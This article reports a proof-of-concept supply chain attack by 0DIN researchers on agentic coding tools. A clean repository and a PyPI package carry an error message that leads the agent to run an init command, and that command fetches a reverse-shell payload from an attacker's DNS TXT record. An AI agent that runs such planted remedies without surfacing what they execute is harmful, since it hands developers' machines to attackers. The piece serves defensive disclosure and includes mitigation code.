When the AI Fixes the Bug — and Opens the Backdoor
A new class of supply chain attack exploits agentic coding tools to deliver payloads that static scanners never get to see
There is no malicious code in the repository. The AI never decides to open a shell. The attack works anyway.
Researchers at Mozilla's Zero Day Investigative Network (0DIN) have demonstrated a proof-of-concept attack that targets developers using agentic coding tools — AI systems like Claude Code that can autonomously clone repositories, install dependencies, and run setup commands on your behalf. The attack delivers a reverse shell to the developer's machine with, as the researchers put it, "no exploit code, no warning, no suspicious command anyone had to approve."
It is not the most technically complex attack ever devised. It is, however, one of the most cleverly designed — because its primary feature is invisibility.
Three harmless pieces, one dangerous machine
The attack is built from three components. Individually, none of them raises a flag. Together, they form a complete exploitation chain.
The first component is a clean GitHub repository. It looks like any other open-source project: a README with setup instructions, a requirements.txt, some source files. A human reviewer would find nothing wrong. A static analysis scanner would return clean. The repository is, in fact, entirely clean — and that is precisely the point.
The standard setup instructions direct the user to install a Python package and then run an initialisation command: pip3 install -r requirements.txt, followed by python3 -m axiom init.
The second component is the Python package itself, hosted on PyPI. It, too, contains no malicious code. But it is engineered with a specific behaviour: it refuses to run until initialised, and it generates an error telling the user exactly what to do about it. Run python3 -m axiom init, it says. This pattern — a package that requires a one-time setup step before it becomes functional — is entirely normal. Every developer has seen it.
The third component is a DNS TXT record controlled by the attacker.
When an agentic coding tool encounters the package's error message, it does what it is designed to do: it tries to fix the problem. It reads the error, identifies the suggested remedy, and runs python3 -m axiom init. The init module, in turn, calls a shell script. The shell script performs a DNS TXT record lookup on a domain the attacker controls. DNS TXT records are a legitimate mechanism for storing configuration values — many real tools use them. The script retrieves the value and executes it as a command.
The value stored in the TXT record is the reverse shell payload.
The attacker now has an interactive shell running as the developer's own user.
The geometry of indirection
What makes this attack genuinely instructive — beyond its immediate danger — is the architecture of its deniability.
At no point did the AI agent evaluate anything suspicious. It evaluated an error message that looked like a standard setup issue. It ran a command that looked like a standard initialisation step. It never saw the shell script's network call. It never saw the DNS query. It never saw the payload.
The 0DIN researchers describe this with precision: "Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw."
This is the architecture of the attack — not a single dramatic exploit, but a chain of individually unremarkable decisions, each delegated to a different layer, none of which crosses a threshold that any current detection system monitors.
Conventional supply chain attacks — dependency confusion, typosquatting, malicious npm packages — work by embedding harmful code somewhere in the delivery chain. Defenders have built tooling to find that code: scanners, lockfile auditing, provenance verification. This attack bypasses all of it by ensuring the harmful content never enters the delivery chain at all. The payload lives in a DNS record that is only fetched at runtime, on the victim's machine, after every check has already passed.
The agentic amplifier
Agentic coding tools do not just introduce a new attack surface. They accelerate the execution of attacks that previously required human interaction.
In a traditional scenario, a developer who clones a malicious repository and follows its setup instructions is still making a series of deliberate choices. Each step is a moment where they might pause, notice something odd, or decide to investigate. The friction of manual execution is, imperfectly but genuinely, a defence.
Agentic tools remove that friction. They are designed to do so — their value proposition is exactly that a developer can describe what they want and delegate the mechanics. An agent that encounters a setup error during repository initialisation does not pause to reflect. It fixes the error. That is its job.
The researchers note that the agent "automates the entire attack chain, including a step that mimics a common user error." The mimicry is important: because the error message looks authentic, because the fix looks routine, and because the agent has been trained to handle routine setup issues helpfully, no part of the system trips an alarm. The attack exploits the agent's competence, not its ignorance.
Distribution: the missing piece that already exists
The 0DIN researchers describe their work as a proof of concept — the attack has not been observed in active exploitation. But they are explicit about what this means, and what it does not.
The technical components are all available. The distribution vectors are already in use for other malicious purposes: job postings that ask candidates to run a code sample, developer tutorials on YouTube with a companion repository in the description, blog posts demonstrating a new framework, and direct messages in developer communities recommending a project. All of these exist today, and all of them could carry a repository built on this pattern without the attacker needing to do anything especially sophisticated.
The only genuinely new element is the targeting: choosing a repository that developers are likely to hand to an agentic tool for setup, and writing the error message to trigger the agent's recovery behaviour rather than catch a human's attention.
What good defence looks like
The 0DIN researchers identify the most impactful single mitigation at the tool level: AI agents should disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime. Currently, an agent that runs python3 -m axiom init presents that as the action it took. It does not surface what that command subsequently did — what scripts it called, what network requests it made, what it executed. Making that chain visible to the developer before or during execution would break the indirection that makes the attack work.
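To make the idea of disclosing the full execution chain concrete, here is a minimal sketch of how a tool might render the process tree behind a single setup command. It assumes some tracer already records process starts. The ExecEvent record, the setup.sh script name, the use of dig, and the config.example.com domain are all hypothetical illustrations, not details from the 0DIN research or from any real agent.

```python
from collections import defaultdict
from typing import NamedTuple


class ExecEvent(NamedTuple):
    """One process start, as a hypothetical tracer might record it."""
    pid: int
    ppid: int
    argv: tuple[str, ...]


def render_chain(events: list[ExecEvent], root_pid: int) -> list[str]:
    """Return an indented listing of every process descended from root_pid."""
    children = defaultdict(list)
    by_pid = {}
    for ev in events:
        by_pid[ev.pid] = ev
        children[ev.ppid].append(ev.pid)

    lines = []

    def walk(pid: int, depth: int) -> None:
        ev = by_pid[pid]
        lines.append("  " * depth + " ".join(ev.argv))
        for child in children[pid]:
            walk(child, depth + 1)

    walk(root_pid, 0)
    return lines


# Illustrative events only; the script name, lookup tool, and domain are made up.
EVENTS = [
    ExecEvent(100, 1, ("python3", "-m", "axiom", "init")),
    ExecEvent(101, 100, ("sh", "setup.sh")),
    ExecEvent(102, 101, ("dig", "+short", "TXT", "config.example.com")),
    ExecEvent(103, 101, ("sh", "-c", "<value returned by the TXT lookup>")),
]

if __name__ == "__main__":
    print("\n".join(render_chain(EVENTS, root_pid=100)))
```

Shown to the developer, a listing like this puts the nested script, the DNS lookup, and the final shell invocation on the same screen as the one command the agent reported running.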
Alongside that, the researchers recommend that agents seek explicit confirmation before running any command that retrieves and executes content from a remote source — DNS, HTTP, or otherwise. This is a meaningful friction point precisely because it is placed at the moment the chain becomes dangerous, rather than at an earlier stage where everything still looks clean.
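A confirmation gate of this kind could start from a simple heuristic: flag any script text that both fetches remote content and contains an execution sink. The sketch below is an assumption about how such a check might look, not a description of any existing agent. The pattern lists are hypothetical, deliberately short, and easy to evade, so treat it as a first filter rather than a guarantee.

```python
import re

# Hypothetical, deliberately small pattern lists; a real tool would need more.
FETCH_PATTERNS = [
    r"\bdig\b",
    r"\bnslookup\b",
    r"\bhost\s+-t\b",
    r"\bcurl\b",
    r"\bwget\b",
]
EXEC_PATTERNS = [
    r"\beval\b",
    r"\b(?:sh|bash|zsh)\s+-c\b",
    r"\|\s*(?:sh|bash|zsh)\b",
]


def needs_confirmation(script_text: str) -> bool:
    """True when the text both fetches remote content and has an execution sink."""
    fetches = any(re.search(p, script_text) for p in FETCH_PATTERNS)
    executes = any(re.search(p, script_text) for p in EXEC_PATTERNS)
    return fetches and executes
```

To be useful against the attack described here, the check would have to run over the scripts a command invokes, not only over the command line the agent sees, since python3 -m axiom init by itself matches nothing.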
For developers and security teams, the practical guidance is more immediate. Running unfamiliar repositories in an ephemeral environment — a VM, a container, a disposable CI runner — before executing them on a development machine limits the blast radius even if the attack succeeds. Monitoring outbound DNS TXT queries from developer workstations can surface this class of attack in post-incident analysis. And, critically, security teams should update their threat models: static scanning of cloned repositories will not detect this. Treating a clean scan as a security guarantee is now more dangerous than it used to be.
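As one illustration of the DNS monitoring suggestion, the sketch below filters a resolver log for TXT queries to domains outside an allowlist. The log format (timestamp, client address, query name, and query type separated by whitespace) and the example-corp.com allowlist entry are assumptions made for this example; real resolver logs differ and would need their own parser.

```python
from typing import Iterable, Iterator

# Hypothetical allowlist of domain suffixes expected to serve TXT records.
ALLOWED_SUFFIXES = ("example-corp.com",)


def is_allowed(qname: str, allowed: tuple[str, ...] = ALLOWED_SUFFIXES) -> bool:
    """True when qname equals, or is a subdomain of, an allowed suffix."""
    name = qname.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in allowed)


def flag_txt_queries(lines: Iterable[str]) -> Iterator[tuple[str, str, str]]:
    """Yield (timestamp, client, qname) for TXT queries outside the allowlist."""
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not match the assumed format
        timestamp, client, qname, qtype = parts
        if qtype.upper() == "TXT" and not is_allowed(qname):
            yield timestamp, client, qname
```

Legitimate software also issues TXT queries, so output like this is a starting point for investigation rather than proof of compromise.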
The deeper lesson
Supply chain security has, for the past several years, focused heavily on what is in the code — on detecting and preventing the introduction of malicious content into packages, registries, and repositories. That work is valuable and necessary. But this attack is a reminder that the question "is there malicious code here?" is not the same question as "is this safe to run?"
When execution is delegated to an autonomous agent, the attack surface expands to include everything the agent will do in response to the code — its error handling, its recovery behaviour, its helpfulness. An agent that encounters a confusing error message and resolves it without surfacing the full chain of what it ran has, in this scenario, done exactly what it was designed to do. The design is the vulnerability.
That does not make agentic tools net-harmful. It means that as they become standard parts of the development workflow, the security assumptions we bring to that workflow need to evolve with them. The tools are new. The threats they enable, and the defences they require, are new too.